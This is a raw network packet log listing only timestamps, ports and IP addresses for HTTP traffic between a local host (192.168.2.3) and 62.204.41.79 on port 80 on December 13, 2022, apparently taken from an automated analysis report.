                                              Dec 13, 2022 20:09:14.401714087 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.401851892 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.401869059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.401907921 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.402106047 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.402127028 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.402203083 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.402275085 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.402415991 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.402523041 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.402637005 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.402714014 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.402741909 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.402932882 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.403044939 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.403117895 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.403140068 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.403201103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.403637886 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.403664112 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.403692961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.403772116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.403793097 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.403893948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.403929949 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.403959990 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.404077053 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.404179096 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.404203892 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.404300928 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.404328108 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.404400110 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.404409885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.404552937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.404706955 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.404830933 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.405078888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.405266047 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.405375957 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.405529022 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.405658007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.405847073 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.406121016 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.406279087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.406421900 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.406666994 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.406791925 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.406929016 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.407059908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.407195091 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.407339096 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.407485008 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.407632113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.407903910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.408097982 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.408236980 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.408370018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.408489943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.408587933 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.408688068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.408904076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.409090996 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.409225941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.409374952 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.409543037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.409683943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.409822941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.409955978 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.410092115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.410237074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.410384893 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.410533905 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.410945892 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.411086082 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.411192894 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.411292076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.411441088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.411637068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.411978006 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.412097931 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.412199974 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.412296057 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.422931910 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.423511028 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.423537970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.423657894 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.423769951 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.424649000 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.424731016 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.424849033 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.426076889 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.426095963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.427655935 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.428561926 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.428966045 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.429210901 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.429419994 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.429511070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.429693937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.429784060 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.429913998 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.430012941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.430123091 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.430246115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.430337906 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.430459976 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.430600882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.430692911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.430846930 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.430982113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.431221008 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.431611061 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.431925058 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.432199001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.432523012 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.432882071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.433157921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.435597897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.435677052 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.435724020 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.435883045 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.435928106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.436124086 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.436148882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.436373949 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.436608076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.436825991 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.436939001 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.437131882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.437377930 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.437483072 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.437751055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.438009977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.438297033 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.438422918 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.438520908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.438776970 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.438873053 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.438967943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.439058065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.439148903 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.439240932 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.439335108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.439424038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.439516068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.439606905 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.439717054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.439857006 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.439946890 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.440037012 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.440131903 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.440375090 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.440716028 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.440869093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.440886974 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.440900087 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.440907955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.440922976 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.440937042 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.441035032 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.441040039 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.441164017 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.441318989 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.441523075 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.441690922 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.441704035 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.441764116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.441883087 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.442080975 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.442611933 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.443233013 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.443532944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.443682909 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.443830967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.443983078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.444125891 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.444264889 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.444686890 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.445131063 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.445487022 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.445749044 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.446232080 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.446671963 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.446938038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.446968079 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.447022915 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.447047949 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.447096109 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.447123051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.447252989 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.447280884 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.447387934 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.447467089 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.447588921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.447686911 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.450366974 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.450625896 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.454039097 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.454076052 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.454101086 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.454443932 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.454618931 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.454644918 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.454668045 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.454778910 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.455077887 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.455152035 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.455259085 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.455420971 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.455627918 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.455691099 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.455941916 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.456192970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.456387997 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.456445932 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.456676006 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.456701040 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.456820011 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.456978083 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.457201958 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.457266092 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.457372904 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.457587957 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.457617044 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.457734108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.457736969 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.458200932 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.458451986 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.458477974 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.458595037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.458712101 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.458734989 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.458928108 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.458972931 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.458991051 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.459008932 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.459054947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.459069014 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.459148884 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.459264040 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.459369898 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.459414005 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.459532976 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.459569931 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.459882021 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.460045099 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.460069895 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.460366964 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.460573912 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.460658073 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.460802078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.461215019 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.461234093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.461473942 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.461601973 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.461616039 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.461697102 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.461760044 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.461786985 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.462061882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.462145090 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.462521076 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.462564945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.463040113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.463479042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.463891983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.464334011 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.464667082 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.464694023 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.464708090 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.464777946 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.464890003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.465055943 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.465217113 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.465286970 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.465331078 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.465631962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.465647936 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.465771914 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.465933084 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.466094971 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.466125965 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.466175079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.466418982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.466613054 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.466732025 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.466973066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.467196941 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.467257023 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.467417002 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.467536926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.467643976 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.467868090 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.468004942 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.468132973 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.468400955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.468739033 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.468756914 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.468856096 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.468930960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.469055891 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.469188929 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.469357014 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.469518900 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.469691038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.469707966 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.469908953 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.470140934 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.470288038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.470345974 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.470379114 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.470577955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.470704079 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.471008062 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.471029043 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.471476078 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.471528053 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.471649885 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.471687078 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.471856117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.472116947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.472511053 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.472621918 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.472762108 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.472832918 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.473030090 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.473449945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.473709106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.474013090 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.474286079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.474706888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.474986076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.475261927 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.475538015 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.489376068 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.489686012 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.489728928 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.490032911 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.490075111 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.490165949 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.490255117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.490423918 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.490585089 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.490649939 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.490688086 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.490849972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.490942001 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.491419077 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.491461992 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.491734028 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.491832972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.492234945 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.492634058 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.492779016 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.493029118 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.493367910 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.493632078 CET804973662.204.41.79192.168.2.3
